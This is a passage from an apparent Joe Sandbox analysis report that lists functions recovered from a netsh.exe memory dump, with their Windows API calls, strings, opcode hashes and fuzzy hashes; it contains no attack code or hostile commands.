              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
              • String ID:
              • API String ID: 1445889803-0
              • Opcode ID: 25db3a8d4b22288bf998b6bee93068d5730a23e3d51a9c306a6c66aa60ea8d95
              • Instruction ID: 676ed3d58b587e07e3c1ff4b728263c3c7d0ba62c138c5b05a9738c9307d46d9
              • Opcode Fuzzy Hash: 25db3a8d4b22288bf998b6bee93068d5730a23e3d51a9c306a6c66aa60ea8d95
              • Instruction Fuzzy Hash: 13111F71E05108DFCF20DFB8E64969EB7F8FF58314F624459D812EB218E6349A04DB50
              Function 015696E0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
              Download Yara Rule
              APIs
              • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,01569816,01561000), ref: 015696E7
              • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(01569816,?,01569816,01561000), ref: 015696F0
              • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,01569816,01561000), ref: 015696FB
              • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,01569816,01561000), ref: 01569702
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
              • String ID:
              • API String ID: 3231755760-0
              • Opcode ID: eb3246e0889522affad0a65a2d047040cb8812d370dd9e6c74f14e63c00e87a3
              • Instruction ID: 59865d5e451faff138069c1139dcb6f9d01a60ba8bbe7087e1f58ca9982b658d
              • Opcode Fuzzy Hash: eb3246e0889522affad0a65a2d047040cb8812d370dd9e6c74f14e63c00e87a3
              • Instruction Fuzzy Hash: 04D0C932014144ABCB222BE1FC0EA593E38FB4427AF068004F72A8A004CB314409EB71
              Function 015692E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
              Download Yara Rule
              APIs
              • memset.MSVCRT ref: 0156930D
              • GetVersionExW.API-MS-WIN-CORE-SYSINFO-L1-1-0(0000011C,?,?,?), ref: 01569326
                • Part of subcall function 01564F00: _vsnwprintf.MSVCRT ref: 01564F32
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Version_vsnwprintfmemset
              • String ID: %d.%d.%d
              • API String ID: 413895009-3144769927
              • Opcode ID: 5b9993c77d801cee0ebd537a8d52ea3b2c417e0cc3b12f3f87c89535f16cde86
              • Instruction ID: 4e1e1e30adc7ff8f0741d1c0eed70e14602eb4519d4c1e1503bf005695fd50ee
              • Opcode Fuzzy Hash: 5b9993c77d801cee0ebd537a8d52ea3b2c417e0cc3b12f3f87c89535f16cde86
              • Instruction Fuzzy Hash: 651187B0A002197AD7609F62EC0AFFFBABCFBD5B14F004059F9146F244DA745954E7A1
              Function 01564068 Relevance: 2.5, APIs: 2, Instructions: 35memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,015671E2), ref: 015640AE
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015640B5
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$FreeProcess
              • String ID:
              • API String ID: 3859560861-0
              • Opcode ID: 4602f5275e7bedb2b9e1dcbb8da4525097b23e6156707eb2f7da1fb8ea962c4a
              • Instruction ID: eacf288ec3b74369a4164529bb208b1e4d540f63d41d2ad7bda06acf442f417a
              • Opcode Fuzzy Hash: 4602f5275e7bedb2b9e1dcbb8da4525097b23e6156707eb2f7da1fb8ea962c4a
              • Instruction Fuzzy Hash: DCF080757113219FEB349E65F89AB7AB769FB40736F02401DD5198F184CB705808FB90
              Function 01569930 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
              Download Yara Rule
              APIs
              • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000098E0), ref: 01569935
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 370ffb5c0d39128dc9f9fd64e922d031e92eddb678ca0daa85ae697a222d20a1
              • Instruction ID: d6c8979a733dcdc1f8021a2f915c025c572d5c7e6e329d0ce0a09094af7ac104
              • Opcode Fuzzy Hash: 370ffb5c0d39128dc9f9fd64e922d031e92eddb678ca0daa85ae697a222d20a1
              • Instruction Fuzzy Hash: AA900260265150CA8A111F736C1A80565986A4855A7424858A111CD008DF704004F671
              Function 01566BF1 Relevance: 77.5, APIs: 36, Strings: 8, Instructions: 453memoryCOMMON
              Download Yara Rule
              APIs
              • memset.MSVCRT ref: 01566C2D
              • memset.MSVCRT ref: 01566C3D
              • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 01566C74
              • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 01566C7B
              • wprintf.MSVCRT ref: 01566C94
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: memset$HandleHeapInformationModulewprintf
              • String ID: %s$%s>$GetModuleHandle failed$MprmsgGetErrorString$api-ms-win-appmodel-runtime-l1-1-0.dll$mprmsg.dll$netsh$netsh.exe
              • API String ID: 2957350143-4264442765
              • Opcode ID: 7b61d59160e850ead5ebe8af8498987c3942ce51087cad80c21c0471e1449823
              • Instruction ID: f51f7d629c6cbcb19a8d8a9368e76ea5820c515b39bca7c770df4a995f29eee4
              • Opcode Fuzzy Hash: 7b61d59160e850ead5ebe8af8498987c3942ce51087cad80c21c0471e1449823
              • Instruction Fuzzy Hash: B5F1F775A00627DBDB319F25EC89AADB7BDFB44224F4040AAE4069F144DB319E84CFE5
              Function 01562810 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 238memoryCOMMON
              Download Yara Rule
              APIs
              • MatchToken.NETSH(?,help), ref: 01562879
                • Part of subcall function 01567690: _wcsnicmp.MSVCRT ref: 015676BC
              • MatchToken.NETSH(?,015612B0,?,help), ref: 01562891
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,015612B0,?,help), ref: 015628A6
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015628AD
              • MatchTagsInCmdLine.NETSH(?,?,?,mode,00000002,00000000), ref: 015628D8
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 015628E6
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015628ED
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Match$ProcessToken$AllocFreeLineTags_wcsnicmp
              • String ID: append$close$help$mode$name$open
              • API String ID: 60316392-503993532
              • Opcode ID: d485c39989d9969d515b13a962ec76ea861542ab80e97cbb009f970ad1d21312
              • Instruction ID: edab77d8e227ddb44bca1847d6404b73c36903d95264a2e7b283291e29f2233f
              • Opcode Fuzzy Hash: d485c39989d9969d515b13a962ec76ea861542ab80e97cbb009f970ad1d21312
              • Instruction Fuzzy Hash: C091D871A002199FDF228FA8E889EAE7BBDFB48364F050119E515FF290D7709D04DBA1
              Function 01562590 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 200memorywindowCOMMON
              Download Yara Rule
              APIs
              • MatchToken.NETSH(?,help), ref: 0156261F
              • MatchToken.NETSH(?,015612B0,?,help), ref: 01562638
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,015612B0,?,help), ref: 0156264D
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562654
              • MatchTagsInCmdLine.NETSH(01561284,?,?,?,00000003,00000000), ref: 0156267C
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 0156268D
              • _wcsicmp.MSVCRT ref: 0156272F
              • PrintMessageFromModule.NETSH(000000A9,?), ref: 0156274D
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000208), ref: 0156275B
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562762
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 0156278C
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562793
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562694
                • Part of subcall function 01566A15: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?), ref: 01566A4C
                • Part of subcall function 01566A15: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01566A53
                • Part of subcall function 01566A15: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?), ref: 01566A85
                • Part of subcall function 01566A15: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01566A8C
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 015627B6
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015627BD
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000), ref: 015627C9
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015627D0
              • PrintMessageFromModule.NETSH(00003AA0), ref: 015627F1
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$Free$AllocMatch$FromMessageModulePrintToken$LineTags_wcsicmp
              • String ID: help$name$pwd$user
              • API String ID: 1986014345-3860914806
              • Opcode ID: be0983bc5a858d81d8e266b8ab998093e9c3bee4652394af5e6bca109e02eef5
              • Instruction ID: 1e7c72b983da6b3efdc30a65fb5caca854657bd8aea21d4c6b443d3e74fb83b9
              • Opcode Fuzzy Hash: be0983bc5a858d81d8e266b8ab998093e9c3bee4652394af5e6bca109e02eef5
              • Instruction Fuzzy Hash: 7C6190B16183029FD7219F69D889A6E7BEDBB88714F05091DF949DF244DB34C9048BA2
              Function 01568A48 Relevance: 38.6, APIs: 13, Strings: 9, Instructions: 127stringCOMMON
              Download Yara Rule
              APIs
              • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,01561A54,?,?,?), ref: 01568A94
              • memcmp.MSVCRT ref: 01568AA4
              • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,ras,?,?), ref: 01568AD8
              • MatchToken.NETSH(?,diagnostics,?,?), ref: 01568B1C
              • MatchToken.NETSH(?,set,?,diagnostics,?,?), ref: 01568B31
              • MatchToken.NETSH(?,show,?,set,?,diagnostics,?,?), ref: 01568B42
              • MatchToken.NETSH(?,tracing,?,set,?,diagnostics,?,?), ref: 01568B54
              • MatchToken.NETSH(?,user,?,tracing,?,set,?,diagnostics,?,?), ref: 01568B66
              • MatchToken.NETSH(?,add,?,user,?,tracing,?,set,?,diagnostics,?,?), ref: 01568B77
              • MatchToken.NETSH(?,delete,?,add,?,user,?,tracing,?,set,?,diagnostics,?,?), ref: 01568B88
              • MatchToken.NETSH(?,dump,?,delete,?,add,?,user,?,tracing,?,set,?,diagnostics,?,?), ref: 01568B99
              • MatchToken.NETSH(?,set,?,dump,?,delete,?,add,?,user,?,tracing,?,set,?,diagnostics), ref: 01568BAA
              • MatchToken.NETSH(?,show,?,set,?,dump,?,delete,?,add,?,user,?,tracing,?,set), ref: 01568BBB
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: MatchToken$lstrcmpi$memcmp
              • String ID: add$delete$diagnostics$dump$ras$set$show$tracing$user
              • API String ID: 4174612407-597535005
              • Opcode ID: e0f9a0498fda055fcdea31d75530a768b82fdc4c61160a12379d936e919056f5
              • Instruction ID: 4f330c6428a463be8de8b0f210f97b03ddbacd494628e3647081801d9bdd602a
              • Opcode Fuzzy Hash: e0f9a0498fda055fcdea31d75530a768b82fdc4c61160a12379d936e919056f5
              • Instruction Fuzzy Hash: 824180706007079EDB52AF2EC886ABEBAADBF94648F44442DD542EF125E7719911CBC0
              Function 01566790 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 152memorywindowstringCOMMON
              Download Yara Rule
              APIs
              • PrintMessage.NETSH([%1!s!] ,?), ref: 015667C7
              • PrintMessage.NETSH(01574AE0), ref: 015667DD
              • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(netsh,0156B2F0), ref: 015667F0
              • PrintMessageFromModule.NETSH(000003EF,015617F4,015617E0), ref: 0156682B
                • Part of subcall function 01567EA0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
                • Part of subcall function 01567EA0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
              • PrintMessage.NETSH(%1!s!>,netsh), ref: 01566847
              • iswctype.MSVCRT(?,00000008,00000000,?,?), ref: 0156686D
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?), ref: 015668AD
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015668B4
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?,00000000,?,?), ref: 015668EB
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015668F2
              • ProcessCommand.NETSH(?,?), ref: 015668FF
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 0156691C
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01566923
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01566935
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156693C
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$FreeMessagePrint$AddressCommandFromLoadModuleProcStringiswctypelstrcmpi
              • String ID: %1!s!>$[%1!s!] $netsh
              • API String ID: 1372608480-1238292096
              • Opcode ID: 013dec69786dd268eed701a5e3499189bca3bbc0f9c708f50832faf4dada4a46
              • Instruction ID: ab8aa4687e479a2fbaea19f4750b60ea005f5c9034d4d2ddbf5d0362af7a097e
              • Opcode Fuzzy Hash: 013dec69786dd268eed701a5e3499189bca3bbc0f9c708f50832faf4dada4a46
              • Instruction Fuzzy Hash: F8510871E10216EFDB219FB9D8498AEB7FDFF44614B11041AE915EF240EB708944DBE0
              Function 01562B20 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 164memoryCOMMON
              Download Yara Rule
              APIs
              • MatchToken.NETSH(?,help), ref: 01562B5B
                • Part of subcall function 01567690: _wcsnicmp.MSVCRT ref: 015676BC
              • MatchToken.NETSH(?,015612B0,?,help), ref: 01562B70
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000004,?,015612B0,?,help), ref: 01562B80
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562B87
              • MatchTagsInCmdLine.NETSH(?,?,015612B8,mode,00000001,00000000), ref: 01562BAD
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01562BBB
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562BC2
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Match$ProcessToken$AllocFreeLineTags_wcsnicmp
              • String ID: help$mode$offline$online
              • API String ID: 60316392-1053974117
              • Opcode ID: aca0eac9b704f15d272ccfddedc924c99fbac09db48c159f8604493894f8b232
              • Instruction ID: cb5fedfddcf2c484bd64823d66db63d43acc0df9954a9fb5a4086c2a0c830ab9
              • Opcode Fuzzy Hash: aca0eac9b704f15d272ccfddedc924c99fbac09db48c159f8604493894f8b232
              • Instruction Fuzzy Hash: 23510472A00507AFEB229FA8D849BAE7BBDFB84314F014024E915AF258DB309D05CBD1
              Function 01563CED Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 160memoryregistrywindowCOMMON
              Download Yara Rule
              APIs
              • _wcsicmp.MSVCRT ref: 01563D15
              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,SOFTWARE\Microsoft\NetSh,00000000,000F003F,01563978), ref: 01563D87
              • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(01563978,?), ref: 01563DA2
              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(01563978), ref: 01563DAD
              • PrintMessageFromModule.NETSH(000003E9,?), ref: 01563DC3
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01563DE3
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563DEA
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01563DFD
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563E04
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01563E1E
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563E25
              • memcpy.MSVCRT ref: 01563E43
              • memcpy.MSVCRT ref: 01563E67
              • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?), ref: 01563EA8
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01563EB7
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563EBE
              Strings
              • SOFTWARE\Microsoft\NetSh, xrefs: 01563D7D
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$FreeProcess$memcpy$AllocCloseDeleteFromLibraryMessageModuleOpenPrintValue_wcsicmp
              • String ID: SOFTWARE\Microsoft\NetSh
              • API String ID: 915751017-276136757
              • Opcode ID: fbea5d0f635231b01e88f717cf4a921d0d9f6235b77cbb591f0378f5f5e71252
              • Instruction ID: 2833951a7f68683a2490d7212dbdf8437e1a5374f9b2f6af62a40594cf61f8b7
              • Opcode Fuzzy Hash: fbea5d0f635231b01e88f717cf4a921d0d9f6235b77cbb591f0378f5f5e71252
              • Instruction Fuzzy Hash: 0551D8B1E10111AFCB618FA8F88EA6DBBBCFB44368B164415E919DF245C730DD04DBA0
              Function 01563ED3 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 128memoryregistrywindowCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,SOFTWARE\Microsoft\NetSh,00000000,00020019,?), ref: 01563EFB
              • RegQueryInfoKeyW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 01563F20
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?), ref: 01563F44
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563F4B
              • PrintMessageFromModule.NETSH(00000068), ref: 01563F5F
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?), ref: 01563F6F
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563F76
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01563F84
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563F8B
              • RegEnumValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 01563FBA
              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000), ref: 01563FE7
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01563FF3
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563FFA
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01564006
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156400D
              Strings
              • SOFTWARE\Microsoft\NetSh, xrefs: 01563EEA
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$Free$Alloc$CloseEnumFromInfoMessageModuleOpenPrintQueryValue
              • String ID: SOFTWARE\Microsoft\NetSh
              • API String ID: 1499200800-276136757
              • Opcode ID: 574aaf270e0eec6c9e3f1ee7c53528c5ac4cf6293e1a5e63837fcc0f1fa78e74
              • Instruction ID: f3882739ba752b6375e0849dc1b6c31d872b4dd974a3e2030a0f7dc060cba092
              • Opcode Fuzzy Hash: 574aaf270e0eec6c9e3f1ee7c53528c5ac4cf6293e1a5e63837fcc0f1fa78e74
              • Instruction Fuzzy Hash: 84419571910119BFDB219BA9EC8DEAFBBBCFB44725F110025B56DEB144DA348904DBB0
              Function 0156587A Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 165memorywindowstringCOMMON
              Download Yara Rule
              APIs
              • MatchToken.NETSH(?,help,?,00000000,00000000,?,?,?,01564AEF,?,00000002,?,?,?,00000000), ref: 015658A5
                • Part of subcall function 01567690: _wcsnicmp.MSVCRT ref: 015676BC
              • MatchToken.NETSH(?,015612B0,?,help,?,00000000,00000000,?,?,?,01564AEF,?,00000002,?,?,?), ref: 015658B6
              • PrintError.NETSH(00000000,00000000,?,01564AEF,?,00000002,?,?,?,00000000,?,?,00000000), ref: 015658FA
              • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,netsh,?,00000000,00000000,?,?,?,01564AEF,?,00000002,?,?,?,00000000), ref: 01565913
              • PrintError.NETSH(00000000,00003A99,?,01564AEF,?,00000002,?,?,?,00000000,?,?,00000000), ref: 01565961
              • PrintMessageFromModule.NETSH(00000000,00000002,?,01564AEF,?,00000002,?,?,?,00000000,?,?,00000000), ref: 0156597E
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,01564AEF,?,00000002,?,?,?,00000000), ref: 015659CE
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564AEF,?,00000002,?,?,?,00000000), ref: 015659D5
              • PrintMessageFromModule.NETSH(?,?,00000000,?,0156131C,00000000,?,01564AEF,?,00000002,?,?,?,00000000), ref: 01565A10
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01565A1C
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01565A23
              • PrintMessageFromModule.NETSH(?,?,?,?,01564AEF,?,00000002,?,?,?,00000000), ref: 01565A33
                • Part of subcall function 01567EA0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
                • Part of subcall function 01567EA0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
              • PrintMessage.NETSH(01561320,?,01564AEF,?,00000002,?,?,?,00000000,?,?,00000000), ref: 01565A55
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Print$HeapMessage$FromModule$ErrorMatchProcessToken$AddressAllocFreeLoadProcString_wcsnicmplstrcmpi
              • String ID: help$netsh
              • API String ID: 691894897-4263905064
              • Opcode ID: 54c400d8bae666632fc7c93a86ea0c124001db5e90a782b3ccbba0f5a256fe82
              • Instruction ID: 007129a65710c891387262502b9f3428484d7ff68e018e02b83a46dba655390c
              • Opcode Fuzzy Hash: 54c400d8bae666632fc7c93a86ea0c124001db5e90a782b3ccbba0f5a256fe82
